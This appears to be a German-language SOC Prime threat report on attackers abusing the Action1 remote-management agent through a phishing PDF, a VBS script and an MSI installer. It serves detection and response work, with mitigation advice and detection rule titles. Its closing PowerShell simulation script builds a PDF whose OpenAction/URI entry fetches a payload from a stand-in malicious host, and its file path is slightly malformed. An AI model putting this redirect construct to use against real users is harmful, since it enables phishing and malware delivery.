SOC Prime Bias: High

06 Oct 2026 14:36 UTC

Missbrauch von RMM-Tools nimmt in aktiven Bedrohungskampagnen weiter zu

Author Photo
SOC Prime Team linkedin icon Folgen
Missbrauch von RMM-Tools nimmt in aktiven Bedrohungskampagnen weiter zu
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Bedrohungsakteure missbrauchen Remote-Management- und Monitoring-Tools (RMM), insbesondere Action1, um einen dauerhaften Zugriff in kompromittierten Umgebungen einzurichten. Der Angriff beginnt mit einer Phishing-E-Mail, die eine bösartige PDF-Datei enthält, die die Opfer zu einer VBS-Datei umleitet. Das Skript lädt dann ein MSI-Paket herunter und installiert es, das den legitimen Action1-Agenten enthält, wodurch unbefugter Remote-Zugriff ermöglicht wird.

Untersuchung

Die Untersuchung deckte eine bösartige PDF-Datei auf, die OpenAction- und URI-Schlüsselwörter nutzt, um einen Download von einer Vercel-gehosteten URL zu initiieren. Die Analyse des abgerufenen MSI-Pakets zeigte, dass legale Dateien der Action1 Corporation durch die eigene Cloud-Infrastruktur des Anbieters missbraucht wurden. Der installierte Agent enthält eine spezifische CustomerID und kommuniziert mit einer legitimen Action1-Domain.

Minderung

Organisationen sollten die E-Mail-Filterung so konfigurieren, dass verdächtige PDF-Strukturen identifiziert werden, die OpenAction- oder URI-Schlüsselwörter enthalten. Sicherheitsteams sollten die Installation unautorisierter RMM-Tools und die Erstellung des A1Agent-Dienstes überwachen. Das Blockieren von Verbindungen zu unerwarteter RMM-Cloud-Infrastruktur und das Erkennen ungewöhnlicher oder unautorisierter CustomerIDs kann das Risiko von Missbrauch durch Fernzugriff weiter verringern.

Reaktion

Wird bösartige RMM-Aktivität entdeckt, sollte der betroffene Host isoliert werden, um zusätzliche Remote-Befehlsausführung zu verhindern. Die ursprüngliche Phishing-E-Mail sollte untersucht und eine forensische Analyse der zugehörigen VBS- und MSI-Dateien durchgeführt werden. Potenziell kompromittierte Anmeldeinformationen sollten widerrufen und Action1-Agenten-Konfigurationen auf Anzeichen unautorisierten Fernzugriffs oder Persistenz überprüft werden.

Angriffsfluss

Wir aktualisieren diesen Teil noch.

Erkennungen

LOLBAS WScript / CScript (über Prozess-Erstellung)

SOC Prime Team
06. Okt. 2026

Alternative Fernzugriffs-/Verwaltungssoftware (über Prozess-Erstellung)

SOC Prime Team
06. Okt. 2026

Mögliche Dateninfiltration/-exfiltration/C2 über Drittanbieterdienste/-tools (über Proxy)

SOC Prime Team
06. Okt. 2026

Mögliche Dateninfiltration/-exfiltration/C2 über Drittanbieterdienste/-tools (über DNS)

SOC Prime Team
06. Okt. 2026

Mögliche Kommando- und Kontrollaktivität durch Fernzugriffs-Software-Domänenkommunikationsversuch (über DNS)

SOC Prime Team
06. Okt. 2026

IOCs (HashSha256), um zu erkennen: Weitere RMM-Tools in freier Wildbahn

SOC Prime AI-Regeln
06. Okt. 2026

Remote-Verbindung zu Action1-Servern [Windows-Netzwerkverbindung]

SOC Prime AI-Regeln
06. Okt. 2026

PDF OpenAction und URI-Umleitung zu bösartigem VBS [Windows-Datei-Ereignis]

SOC Prime AI-Regeln
06. Okt. 2026

Simulation Ausführung

  • Angriffserzählung & Befehle: Der Gegner simuliert eine Phishing-Kampagne. Das Ziel ist es, eine Datei namens Transaktionsbeleg .pdf an ein Opfer zu liefern. Das PDF ist so gestaltet, dass, sobald der Benutzer es öffnet, das /OpenAction Kommando löst eine /URI Weiterleitung aus. Diese Weiterleitung soll den Benutzer zu einer Website führen, die ein bösartiges VBScript bereitstellt. Um die spezifische bereitgestellte Erkennungsregel auszulösen, erstellen wir eine Datei mit dem genau erforderlichen Namen und den internen Zeichenfolgen.

  • Regressionstest-Skript:

    # Simulationsskript: Auslösung der PDF OpenAction-Erkennung
    $targetFile = "$env:USERPROFILEDesktopTransaction Receipt .pdf"
    
    # Erstellung des "bösartigen" PDF-Inhalts, um die Erkennungsschlüsselwörter zu erfüllen
    $pdfContent = @"
    %PDF-1.1
    1 0 obj
    << /Type /Catalog /Pages 2 0 R /OpenAction << /S /URI /URI (http://malicious-site.com/payload.vbs) >> >>
    endobj
    2 0 obj
    << /Type /Pages /Parent 1 0 R /Count 1 >>
    endobj
    trailer
    << /Root 1 0 R >>
    %%EOF
    "@
    
    # Schreiben der Datei auf die Festplatte, um die 'file_event'-Erkennung auszulösen
    $pdfContent | Out-File -FilePath $targetFile -Encoding ascii
    
    Write-Host "Simulationsdatei erstellt unter: $targetFile"
    Write-Host "Überprüfen Sie Ihr SIEM auf den Erkennungsalarm."
  • Bereinigungskommandos:

    # Bereinigung: Entfernen der simulierten bösartigen Datei
    $targetFile = "$env:USERPROFILEDesktopTransaction Receipt .pdf"
    if (Test-Path $targetFile) {
        Remove-Item -Path $targetFile -Force
        Write-Host "Bereinigung abgeschlossen: $targetFile entfernt."
    } else {
        Write-Host "Bereinigung: Datei nicht gefunden."
    }